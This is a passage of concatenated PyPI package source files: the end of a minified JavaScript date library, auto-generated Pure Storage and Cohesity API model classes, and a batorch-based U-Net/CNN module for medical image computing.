n=this.getTimezoneOffset()*-10/6,r;if(n<0){r=(n-10000).toString();return r.charAt(0)+r.substr(2);}else{r=(n+10000).toString();return"+"+r.substr(1);}};$P.getElapsed=function(date){return(date||new Date())-this;};if(!$P.toISOString){$P.toISOString=function(){function f(n){return n<10?'0'+n:n;}
return'"'+this.getUTCFullYear()+'-'+
f(this.getUTCMonth()+1)+'-'+
f(this.getUTCDate())+'T'+
f(this.getUTCHours())+':'+
f(this.getUTCMinutes())+':'+
f(this.getUTCSeconds())+'Z"';};}
$P._toString=$P.toString;$P.toString=function(format){var x=this;if(format&&format.length==1){var c=$C.formatPatterns;x.t=x.toString;switch(format){case"d":return x.t(c.shortDate);case"D":return x.t(c.longDate);case"F":return x.t(c.fullDateTime);case"m":return x.t(c.monthDay);case"r":return x.t(c.rfc1123);case"s":return x.t(c.sortableDateTime);case"t":return x.t(c.shortTime);case"T":return x.t(c.longTime);case"u":return x.t(c.universalSortableDateTime);case"y":return x.t(c.yearMonth);}}
var ord=function(n){switch(n*1){case 1:case 21:case 31:return"st";case 2:case 22:return"nd";case 3:case 23:return"rd";default:return"th";}};return format?format.replace(/(\\)?(dd?d?d?|MM?M?M?|yy?y?y?|hh?|HH?|mm?|ss?|tt?|S)/g,function(m){if(m.charAt(0)==="\\"){return m.replace("\\","");}
x.h=x.getHours;switch(m){case"hh":return p(x.h()<13?(x.h()===0?12:x.h()):(x.h()-12));case"h":return x.h()<13?(x.h()===0?12:x.h()):(x.h()-12);case"HH":return p(x.h());case"H":return x.h();case"mm":return p(x.getMinutes());case"m":return x.getMinutes();case"ss":return p(x.getSeconds());case"s":return x.getSeconds();case"yyyy":return p(x.getFullYear(),4);case"yy":return p(x.getFullYear());case"dddd":return $C.dayNames[x.getDay()];case"ddd":return $C.abbreviatedDayNames[x.getDay()];case"dd":return p(x.getDate());case"d":return x.getDate();case"MMMM":return $C.monthNames[x.getMonth()];case"MMM":return $C.abbreviatedMonthNames[x.getMonth()];case"MM":return p((x.getMonth()+1));case"M":return x.getMonth()+1;case"t":return x.h()<12?$C.amDesignator.substring(0,1):$C.pmDesignator.substring(0,1);case"tt":return x.h()<12?$C.amDesignator:$C.pmDesignator;case"S":return ord(x.getDate());default:return m;}}):this._toString();};}());
|
PypiClean
|
/py-pure-client-1.38.0.tar.gz/py-pure-client-1.38.0/pypureclient/flasharray/FA_2_9/models/resource_performance_no_id_by_array_get_response.py
|
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_9 import models
class ResourcePerformanceNoIdByArrayGetResponse(object):
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Declared attribute name -> swagger type string (consumed by to_dict()).
    swagger_types = {
        'more_items_remaining': 'bool',
        'total_item_count': 'int',
        'continuation_token': 'str',
        'items': 'list[ResourcePerformanceNoIdByArray]',
        'total': 'list[ResourcePerformanceNoIdByArray]'
    }
    # Attribute name -> JSON key in the API definition.
    attribute_map = {
        'more_items_remaining': 'more_items_remaining',
        'total_item_count': 'total_item_count',
        'continuation_token': 'continuation_token',
        'items': 'items',
        'total': 'total'
    }
    # No constructor arguments are required for this model.
    required_args = {
    }
    def __init__(
        self,
        more_items_remaining=None,  # type: bool
        total_item_count=None,  # type: int
        continuation_token=None,  # type: str
        items=None,  # type: List[models.ResourcePerformanceNoIdByArray]
        total=None,  # type: List[models.ResourcePerformanceNoIdByArray]
    ):
        """
        Keyword args:
            more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
            total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
            continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
            items (list[ResourcePerformanceNoIdByArray]): Performance data, broken down by array. If `total_only=true`, the `items` list will be empty.
            total (list[ResourcePerformanceNoIdByArray]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
        """
        # Only attributes that were explicitly provided are set, so unset
        # fields stay absent from __dict__ (and therefore from to_dict()).
        if more_items_remaining is not None:
            self.more_items_remaining = more_items_remaining
        if total_item_count is not None:
            self.total_item_count = total_item_count
        if continuation_token is not None:
            self.continuation_token = continuation_token
        if items is not None:
            self.items = items
        if total is not None:
            self.total = total
    def __setattr__(self, key, value):
        # Reject attributes that are not part of the declared model.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
        self.__dict__[key] = value
    def __getattribute__(self, item):
        value = object.__getattribute__(self, item)
        # Unresolved Property placeholders behave as missing attributes.
        if isinstance(value, Property):
            raise AttributeError
        else:
            return value
    def __getitem__(self, key):
        # Dict-style read access, restricted to declared attributes.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
        return object.__getattribute__(self, key)
    def __setitem__(self, key, value):
        # Dict-style write access, restricted to declared attributes.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
        object.__setattr__(self, key, value)
    def __delitem__(self, key):
        # Dict-style delete, restricted to declared attributes.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
        object.__delattr__(self, key)
    def keys(self):
        # Mirrors dict.keys() over the declared attribute names.
        return self.attribute_map.keys()
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            if hasattr(self, attr):
                value = getattr(self, attr)
                if isinstance(value, list):
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        if issubclass(ResourcePerformanceNoIdByArrayGetResponse, dict):
            for key, value in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ResourcePerformanceNoIdByArrayGetResponse):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
PypiClean
|
/cohesity-sdk-1.1.0.tar.gz/cohesity-sdk-1.1.0/cohesity_sdk/cluster/model/physical_object_protection_response_params.py
|
import re # noqa: F401
import sys # noqa: F401
from cohesity_sdk.cluster.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
    # Deferred imports avoid circular-import problems between generated
    # models; the classes are published via globals() so they resolve by
    # name when openapi_types() runs.
    from cohesity_sdk.cluster.model.physical_file_protection_group_params import PhysicalFileProtectionGroupParams
    from cohesity_sdk.cluster.model.physical_object_protection_params import PhysicalObjectProtectionParams
    from cohesity_sdk.cluster.model.physical_volume_protection_group_params import PhysicalVolumeProtectionGroupParams
    globals()['PhysicalFileProtectionGroupParams'] = PhysicalFileProtectionGroupParams
    globals()['PhysicalObjectProtectionParams'] = PhysicalObjectProtectionParams
    globals()['PhysicalVolumeProtectionGroupParams'] = PhysicalVolumeProtectionGroupParams
class PhysicalObjectProtectionResponseParams(ModelComposed):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.

    Composed model (allOf: PhysicalObjectProtectionParams) describing the
    response parameters of a Physical object protection.

    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """
    # Allowed enum values for 'object_protection_type': "kFile"/"kVolume"
    # or None (the field is nullable).
    allowed_values = {
        ('object_protection_type',): {
            'None': None,
            'KFILE': "kFile",
            'KVOLUME': "kVolume",
        },
    }
    validations = {
    }
    additional_properties_type = None
    _nullable = False
    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        # Deferred import avoids circular-import errors at module load time.
        lazy_import()
        return {
            'object_protection_type': (str, none_type,),  # noqa: E501
            'file_object_protection_type_params': (PhysicalFileProtectionGroupParams,),  # noqa: E501
            'volume_object_protection_type_params': (PhysicalVolumeProtectionGroupParams,),  # noqa: E501
        }
    @cached_property
    def discriminator():
        # This composed model does not use an OpenAPI discriminator.
        return None
    # Mapping from pythonic attribute names to the JSON keys of the spec.
    attribute_map = {
        'object_protection_type': 'objectProtectionType',  # noqa: E501
        'file_object_protection_type_params': 'fileObjectProtectionTypeParams',  # noqa: E501
        'volume_object_protection_type_params': 'volumeObjectProtectionTypeParams',  # noqa: E501
    }
    # Internal bookkeeping attributes set directly on the instance rather
    # than routed into _data_store by the model base class.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
        '_composed_instances',
        '_var_name_to_model_instances',
        '_additional_properties_model_instances',
    ])
    @convert_js_args_to_python_args
    def __init__(self, object_protection_type, *args, **kwargs):  # noqa: E501
        """PhysicalObjectProtectionResponseParams - a model defined in OpenAPI
        Args:
            object_protection_type (str, none_type): Specifies the Physical Object Protection type.
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                                will be type checked and a TypeError will be
                                raised if the wrong type is input.
                                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                                drill down to the model in received_data
                                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                                are serialized names, as specified in the OpenAPI document.
                                False if the variable names in the input data
                                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                                deserializing a file_type parameter.
                                If passed, type conversion is attempted
                                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                                classes that we have traveled through so that
                                if we see that class again we will not use its
                                discriminator again.
                                When traveling through a discriminator, the
                                composed schema that is
                                is traveled through is added to this set.
                                For example if Animal has a discriminator
                                petType and we pass in "Dog", and the class Dog
                                allOf includes Animal, we move through Animal
                                once using the discriminator, and pick Dog.
                                Then in Dog, we will make an instance of the
                                Animal class but this time we won't travel
                                through its discriminator because we passed in
                                _visited_composed_classes = (Animal,)
            file_object_protection_type_params (PhysicalFileProtectionGroupParams): [optional]  # noqa: E501
            volume_object_protection_type_params (PhysicalVolumeProtectionGroupParams): [optional]  # noqa: E501
        """
        # Pop the framework-internal keyword arguments before the remaining
        # kwargs are treated as model properties.
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        constant_args = {
            '_check_type': _check_type,
            '_path_to_item': _path_to_item,
            '_spec_property_naming': _spec_property_naming,
            '_configuration': _configuration,
            '_visited_composed_classes': self._visited_composed_classes,
        }
        required_args = {
            'object_protection_type': object_protection_type,
        }
        model_args = {}
        model_args.update(required_args)
        model_args.update(kwargs)
        # Distribute the supplied values over the composed (allOf) schemas
        # and collect which arguments none of them consumed.
        composed_info = validate_get_composed_info(
            constant_args, model_args, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        unused_args = composed_info[3]
        for var_name, var_value in required_args.items():
            setattr(self, var_name, var_value)
        for var_name, var_value in kwargs.items():
            # Unknown keys are silently dropped only when the configuration
            # explicitly opts in and no additional-properties model exists.
            if var_name in unused_args and \
                        self._configuration is not None and \
                        self._configuration.discard_unknown_keys and \
                        not self._additional_properties_model_instances:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
    @cached_property
    def _composed_schemas():
        # we need this here to make our import statements work
        # we must store _composed_schemas in here so the code is only run
        # when we invoke this method. If we kept this at the class
        # level we would get an error beause the class level
        # code would be run when this module is imported, and these composed
        # classes don't exist yet because their module has not finished
        # loading
        lazy_import()
        return {
          'anyOf': [
          ],
          'allOf': [
              PhysicalObjectProtectionParams,
          ],
          'oneOf': [
          ],
        }
|
PypiClean
|
/pycamia-1.0.38-py3-none-any.whl/micomputing/network.py
|
from pycamia import info_manager
__info__ = info_manager(
project = "PyCAMIA",
package = "micomputing",
author = "Yuncheng Zhou",
create = "2022-03",
fileinfo = "File containing U-net and convolutional networks.",
help = "Use `from micomputing import *`.",
requires = "batorch"
).check()
__all__ = """
U_Net
CNN
FCN
""".split()
import math
with __info__:
import batorch as bt
from batorch import nn
def parse(string):
    """Parse a spec such as ``"normal(0, 0.1)"`` into ``('normal', (0, 0.1))``.

    A bare name (``"shared"``) parses as the name with an empty argument
    tuple; the name is lowercased.  Used for initializer specs like
    ``"uniform(-0.1, 0.1)"`` and arm specs like ``"seperate(2)"``.

    Raises:
        TypeError: if the string contains more than one '(' or ')', or
            mismatched parentheses.
        ValueError: if the arguments are not Python literals.
    """
    import ast  # local import: only needed for argument parsing
    if string.count('(') > 1 or string.count(')') > 1: raise TypeError("Invalid to parse: " + string + ". ")
    if string.count('(') == 0 and string.count(')') == 0: string += '()'
    string = string.lower()
    name, _, rest = string.partition('(')
    # ast.literal_eval only accepts literals, unlike the previous eval-based
    # implementation, so a malformed spec cannot execute arbitrary code.
    if not rest.endswith(')'): raise TypeError("Invalid to parse: " + string + ". ")
    args_str = rest[:-1].strip()
    args = ast.literal_eval('(' + args_str + ',)') if args_str else ()
    return name, args
# Concatenate tensors along dim 1 (the channel axis); used as the default
# skip-connection and multi-arm combiner.
def cat(*tensors): return bt.cat(tensors, 1)
def combine(list_of_items, reduction):
    """Fold ``reduction`` pairwise over ``list_of_items``, left to right.

    A single-element list is returned as its sole item, unreduced; an
    empty list raises IndexError.
    """
    accumulated = list_of_items[0]
    for item in list_of_items[1:]:
        accumulated = reduction(accumulated, item)
    return accumulated
class Convolution_Block(nn.Module):
    """A stack of convolution + batch-norm + activation layers supporting
    plain ('conv'), DenseBlock ('dense') and ResidualBlock ('residual')
    wiring."""
    def __init__(self, in_channels, out_channels, **params):
        '''
        ::parameters:
            dimension (int): The dimension of the images.
            in_channels (int): The input channels for the block.
            out_channels (int): The output channels for the block.
            conv_num (int): The number of convolution layers.
            kernel_size (int): The size of the convolution kernels.
            padding (int): The image padding for the convolutions.
            activation_function (class): The activation function.
            active_args (dict): The arguments for the activation function.
            initializer (str): Weight-initialization spec parsed by parse(),
                e.g. "normal(0, 0.1)".
            conv_block (str): A string with possible values in ('conv', 'dense', 'residual'), indicating which kind of block the U-Net is using: normal convolution layers, DenseBlock or ResidualBlock.
            res_type (function): The combining type for the residual connections.
        '''
        super().__init__()
        # Fix: 'initializer' is read below (parse(self.initializer)) but had
        # no default, so constructing the block standalone without an
        # explicit initializer raised AttributeError.  The default matches
        # U_Net's default initializer.
        default_values = {'dimension': 2, 'conv_num': 1, 'padding': 1, 'kernel_size': 3, 'conv_block': 'conv', 'res_type': bt.add, 'activation_function': nn.ReLU, 'active_args': {}, 'initializer': "normal(0, 0.1)"}
        param_values = {}
        param_values.update(default_values)
        param_values.update(params)
        self.__dict__.update(param_values)
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.layers = nn.ModuleList()
        for i in range(self.conv_num):
            # Dense blocks concatenate all earlier outputs, so the input
            # channel count of layer i grows linearly with i.
            ic = self.in_channels if i == 0 else ((self.out_channels * i + self.in_channels) if self.conv_block == 'dense' else self.out_channels)
            conv = eval('nn.Conv%dd' % self.dimension)(ic, self.out_channels, self.kernel_size, 1, self.padding)
            initialize_model, initialize_params = parse(self.initializer)
            eval('nn.init.%s_' % initialize_model)(conv.weight, *initialize_params)
            if self.conv_block != 'dense': self.layers.append(conv)
            oc = (self.out_channels * i + self.in_channels) if self.conv_block == 'dense' else self.out_channels
            self.layers.append(eval('nn.BatchNorm%dd' % self.dimension)(oc))
            # NOTE(review): `i < self.conv_num` is always true inside this
            # loop, so an activation follows every layer and forward() then
            # activates the output once more; harmless for idempotent
            # activations like ReLU -- confirm if intended before changing.
            if i < self.conv_num: self.layers.append(self.activation_function(**self.active_args))
            if self.conv_block == 'dense': self.layers.append(conv)
    def forward(self, x):
        """Run the block; dense mode re-concatenates all earlier results."""
        if self.conv_block == 'dense':
            conv_results = [x]
            conv_layer = True
            for layer in self.layers:
                # A layer following a conv consumes the concatenation of all
                # previous results (cropped to a common spatial size).
                if conv_layer: x = layer(bt.cat([bt.crop_as(l, conv_results[-1]) for l in conv_results], 1))
                else: x = layer(x)
                conv_layer = layer.__class__.__name__.startswith('Conv')
                if conv_layer: conv_results.append(x)
            return self.activation_function(**self.active_args)(x)
        else:
            y = x
            for layer in self.layers: y = layer(y)
            # Residual mode combines the (cropped) input with the output.
            if self.conv_block == 'residual': z = self.res_type(bt.crop_as(x, y), y)
            else: z = y
            return self.activation_function(**self.active_args)(z)
class U_Net(nn.Module):
    # Channel-wise softmax over dim 1, wrapped as a module so it shows up
    # in the module tree.
    class Softmax(nn.Module):
        def forward(self, x): return nn.functional.softmax(x, 1)
    # One encoder stage: optional max-pooling followed by a Convolution_Block.
    class Encoder_Block(nn.Module):
        def __init__(self, in_channels, out_channels, has_pooling, params):
            super().__init__()
            block_params = params.copy()
            block_params.update({'in_channels': in_channels, 'out_channels': out_channels, 'has_pooling': has_pooling})
            self.__dict__.update(block_params)
            if has_pooling: self.pooling = eval('nn.MaxPool%dd' % self.dimension)(self.pooling_size, ceil_mode = True)
            self.conv_block = Convolution_Block(**block_params)
        def forward(self, x):
            if self.has_pooling: y = self.pooling(x)
            else: y = x
            return self.conv_block(y)
    # One decoder stage: transposed-conv upsampling, skip-combination with
    # the corresponding encoder results, then a Convolution_Block.
    class Decoder_Block(nn.Module):
        def __init__(self, list_of_encoders, in_channels, out_channels, params, copies_of_inputs):
            super().__init__()
            block_params = params.copy()
            block_params.update({'in_channels': in_channels, 'out_channels': out_channels})
            self.__dict__.update(block_params)
            # With concatenating skips the upsampled tensor only provides the
            # channels not supplied by the encoder skip; with add/mul skips
            # all inputs must have matching channel counts.
            if self.skip_type == cat: to_channels = in_channels - list_of_encoders[0].out_channels
            else: assert all([in_channels == encoder.out_channels for encoder in list_of_encoders]); to_channels = in_channels
            self.upsampling = eval('nn.ConvTranspose%dd' % self.dimension)(in_channels * copies_of_inputs, to_channels, self.pooling_size, self.pooling_size, 0)
            block_params.update({'in_channels': to_channels + sum([encoder.out_channels for encoder in list_of_encoders]), 'out_channels': out_channels})
            self.conv_block = Convolution_Block(**block_params)
        def forward(self, x, list_of_encoder_results):
            y = self.upsampling(x)
            # Crop whichever side is larger so all skip inputs share a size
            # ('SAME' padding keeps encoder results the reference size).
            if self.padding == self.kernel_size // 2:
                to_combine = list_of_encoder_results + [bt.crop_as(y, list_of_encoder_results[0])]
            else: to_combine = [bt.crop_as(encoder_result, y) for encoder_result in list_of_encoder_results] + [y]
            joint = combine(to_combine, self.skip_type)
            return self.conv_block(joint)
    def __init__(self, **params):
        '''
        ::paramerters:
            dimension (int): The dimension of the images. For conventional U-Net, it is 2.
            depth (int): The depth of the U-Net. The conventional U-Net has a depth of 4 there are 4 pooling layers and 4 up-sampling layers.
            conv_num (int): The number of continuous convolutions in one block. In a conventional U-Net, this is 2.
            padding (int or str): Indicate the type of padding used. In a conventional U-Net, padding should be 0 but yet the default value is 'SAME' here.
            in_channels (int): The number of channels for the input. In a conventional U-Net, it should be 1.
            out_channels (int): The number of channels for the output. In a conventional U-Net, it should be 2.
            block_channels (int): The number of channels for the first block if a number is provided. In a conventional U-Net, it should be 64.
                If a list is provided, the length should be the same as the number of blocks plus two (2 * depth + 3). It represents the channels before and after each block (with the output channels included).
                Or else, a function may be provided to compute the output channels given the block index (-1 ~ 2 * depth + 1) [including input_channels at -1 and output_channels at 2 * depth + 1].
            kernel_size (int): The size of the convolution kernels. In a conventional U-Net, it should be 3.
            pooling_size (int): The size of the pooling kernels. In a conventional U-Net, it should be 2.
            // keep_prob (float): The keep probability for the dropout layers.
            conv_block (str): A string with possible values in ('conv', 'dense', 'residual'), indicating which kind of block the U-Net is using: normal convolution layers, DenseBlock or ResidualBlock.
            multi_arms (str): A string with possible values in ('shared(2)', 'seperate(2)'), indicating which kind of encoder arms are used.
            multi_arms_combine (function): The combining type for multi-arms. See skip_type for details.
            skip_type (function): The skip type for the skip connections. The conventional U-Net has a skip connect of catenation (cat). Other possible skip types include torch.mul or torch.add.
            res_type (function): The combining type for the residual connections. It should be torch.add in most occasions.
            activation_function (class): The activation function used after the convolution layers. nn.ReLU by default.
            active_args (dict): The arguments for the activation function. {} by default.
            initializer (str): A string indicating the initialing strategy. Possible values are normal(0, 0.1) or uniform(-0.1, 0.1) or constant(0) (all parameters can be changed)
            with_softmax (bool): Whether a softmax layer is applied at the end of the network.
            cum_layers (list): A list consisting two numbers [n, m] indicating that the result would be a summation of the upsamples of the results of the nth to the mth (included) blocks, block_numbers are in range 0 ~ 2 * depth.
                The negative indices are allowed to indicate the blocks in a inversed order with -1 representing the output for the last block.
        '''
        super().__init__()
        default_values = {'dimension': 2, 'depth': 4, 'conv_num': 2, 'padding': 'SAME', 'in_channels': 1, 'out_channels': 2, 'block_channels': 64, 'kernel_size': 3, 'pooling_size': 2, 'keep_prob': 0.5, 'conv_block': 'conv', 'multi_arms': "shared", 'multi_arms_combine': cat, 'skip_type': cat, 'res_type': bt.add, 'activation_function': nn.ReLU, 'active_args': {}, 'initializer': "normal(0, 0.1)", 'with_softmax': True, 'cum_layers': -1}
        param_values = {}
        param_values.update(default_values)
        param_values.update(params)
        self.__dict__.update(param_values)
        # Normalize block_channels: an int becomes the classic U-shaped
        # channel schedule (doubling down to the bottleneck, halving back
        # up); a list is wrapped into an index function with offset 1 so
        # index -1 maps to the input channels.
        if isinstance(self.block_channels, int):
            self.block_channels = [self.in_channels] + [self.block_channels << min(i, 2 * self.depth - i) for i in range(2 * self.depth + 1)] + [self.out_channels]
        bchannels = self.block_channels
        if not callable(self.block_channels): self.block_channels = lambda i: bchannels[i + 1]
        if isinstance(self.padding, str): self.padding = {'SAME': self.kernel_size // 2, 'ZERO': 0, 'VALID': 0}.get(self.padding.upper(), self.kernel_size // 2)
        # Normalize cum_layers to an ordered, in-range [low, high] pair;
        # negative indices wrap around modulo (2 * depth + 1).
        if isinstance(self.cum_layers, int): self.cum_layers = [self.cum_layers, self.cum_layers]
        l, u = self.cum_layers
        l = (l + 2 * self.depth + 1) % (2 * self.depth + 1)
        u = (u + 2 * self.depth + 1) % (2 * self.depth + 1)
        if l > u: l, u = u, l
        self.cum_layers = [max(l, self.depth), min(u, 2 * self.depth)]
        param_values = {k: self.__dict__[k] for k in param_values}
        # Parse the multi-arm spec, e.g. "shared" or "seperate(2)"; shared
        # arms reuse one set of encoder weights.
        self.arm_type, self.arm_num = parse(self.multi_arms)
        self.arm_num = 1 if len(self.arm_num) == 0 else self.arm_num[0]
        if self.arm_type == 'shared': self.dif_arm_num = 1
        else: self.dif_arm_num = self.arm_num
        # Encoder arms: block0_? has no pooling, all deeper blocks pool.
        for iarm in range(self.dif_arm_num):
            for k in range(self.depth + 1):
                setattr(self, 'block%d_%d' % (k, iarm), self.Encoder_Block(self.block_channels(k - 1), self.block_channels(k), k != 0, param_values))
        # 1x1 output heads (and upsamplers) for the cumulative deep-supervision
        # outputs taken from encoder-depth blocks.
        for k in range(self.cum_layers[0], self.depth + 1):
            conv = eval('nn.Conv%dd' % self.dimension)(self.block_channels(k), self.block_channels(2 * self.depth + 1), 1, 1, 0)
            initialize_model, initialize_params = parse(self.initializer)
            eval('nn.init.%s_' % initialize_model)(conv.weight, *initialize_params)
            if k < self.cum_layers[1]:
                setattr(self, 'block%dout' % k, nn.Sequential(conv, self.activation_function(**self.active_args)))
                setattr(self, 'out%dupsample' % k, eval('nn.ConvTranspose%dd' % self.dimension)(
                    self.block_channels(2 * self.depth + 1), self.block_channels(2 * self.depth + 1), self.pooling_size, self.pooling_size, 0
                ))
            else: setattr(self, 'block%dout' % k, conv)
        # Decoder blocks plus their output heads; the first decoder receives
        # the combined multi-arm bottleneck (hence copies_of_inputs).
        for k in range(self.depth + 1, self.cum_layers[1] + 1):
            setattr(self, 'block%d' % k, self.Decoder_Block(
                [getattr(self, 'block%d_%d' % (2 * self.depth - k, iarm)) for iarm in range(self.dif_arm_num)] * (self.arm_num // self.dif_arm_num),
                self.block_channels(k - 1), self.block_channels(k), param_values,
                self.arm_num if k == self.depth + 1 and self.multi_arms_combine == cat else 1
            ))
            conv = eval('nn.Conv%dd' % self.dimension)(self.block_channels(k), self.block_channels(2 * self.depth + 1), 1, 1, 0)
            initialize_model, initialize_params = parse(self.initializer)
            eval('nn.init.%s_' % initialize_model)(conv.weight, *initialize_params)
            if k < self.cum_layers[1]:
                setattr(self, 'block%dout' % k, nn.Sequential(conv, self.activation_function(**self.active_args)))
                setattr(self, 'out%dupsample' % k, eval('nn.ConvTranspose%dd' % self.dimension)(
                    self.block_channels(2 * self.depth + 1), self.block_channels(2 * self.depth + 1), self.pooling_size, self.pooling_size, 0
                ))
            else: setattr(self, 'block%dout' % k, conv)
        if self.with_softmax: self.softmax = self.Softmax()
    def forward(self, x):
        # Accept either (batch, *spatial) for single-channel input or
        # (batch, channels, *spatial); channels are split across the arms.
        size = x.size()[1:]
        if len(size) == self.dimension and self.in_channels == 1: x = x.unsqueeze(1)
        elif len(size) == self.dimension + 1 and self.in_channels * self.arm_num == size[0]: pass
        else: raise ValueError("The input tensor does not correspond to the U-Net structure. ")
        assert size[0] % self.arm_num == 0
        inputs = x.split(size[0] // self.arm_num, 1)
        assert len(inputs) == self.arm_num
        # Encoder pass per arm; intermediate results are cached as
        # attributes so they can be inspected via __getitem__/__iter__.
        for i, y in enumerate(inputs):
            for k in range(self.depth + 1):
                y = getattr(self, 'block%d_%d' % (k, 0 if self.arm_type == 'shared' else i))(y)
                setattr(self, 'block%d_%dresult' % (k, i), y)
        # Combine arm bottlenecks, then run the decoder with skip inputs.
        to_combine = [getattr(self, 'block%d_%dresult' % (self.depth, i)) for i in range(self.arm_num)]
        z = combine(to_combine, self.multi_arms_combine)
        setattr(self, 'block%dresult' % self.depth, z)
        for k in range(self.depth + 1, self.cum_layers[1] + 1):
            z = getattr(self, 'block%d' % k)(z, [getattr(self, 'block%d_%dresult' % (2 * self.depth - k, iarm)) for iarm in range(self.arm_num)])
            setattr(self, 'block%dresult' % k, z)
        # Deep supervision: accumulate upsampled output heads over the
        # cum_layers range; the loop variable k ends at cum_layers[1].
        t = 0
        for k in range(self.cum_layers[0], self.cum_layers[1] + 1):
            setattr(self, 'block_out%dresult' % k, getattr(self, 'block%dout' % k)(getattr(self, 'block%dresult' % k)) + t)
            if k < self.cum_layers[1]: t = getattr(self, 'out%dupsample' % k)(getattr(self, 'block_out%dresult' % k))
        if self.with_softmax: return self.softmax(getattr(self, 'block_out%dresult' % k))
        else: return getattr(self, 'block_out%dresult' % k)
    # Convenience: Adam optimizer wrapped in batorch's Optimization helper.
    def optimizer(self, lr=0.001): return bt.Optimization(bt.optim.Adam, self.parameters(), lr)
    def loss(self, x, y):
        # Cross-entropy of the (softmaxed) prediction against target y;
        # clamping avoids log(0).
        y_hat = self(x)
        clamped = y_hat.clamp(1e-10, 1.0)
        self.y_hat = y_hat
        return - bt.sum(y * bt.log(clamped), 1).mean().mean()
    def __getitem__(self, i):
        # Fetch a cached intermediate result; an int index on a single-arm
        # encoder block is promoted to the (block, arm=0) pair.
        if self.arm_num == 1 and i <= self.depth: i = (i, 0)
        return getattr(self, 'block%dresult' % i if isinstance(i, int) else 'block%d_%dresult' % i)
    def __iter__(self):
        # Yield (attribute name, index) pairs for every cached block result.
        for i in range(2 * self.depth + 1):
            if i <= self.depth:
                for iarm in range(self.arm_num):
                    yield 'block%d_%dresult' % (i, iarm), (i, iarm)
            else: yield 'block%dresult' % i, i
class CNN(U_Net):
    # A classification CNN expressed as the encoder half of a U_Net: depth
    # is blocks - 1, the decoder is disabled by setting cum_layers = depth,
    # and the spatial output is globally averaged in forward().
    def __init__(self, dimension = 2, blocks = 5, conv_num = 2, padding = 'SAME',
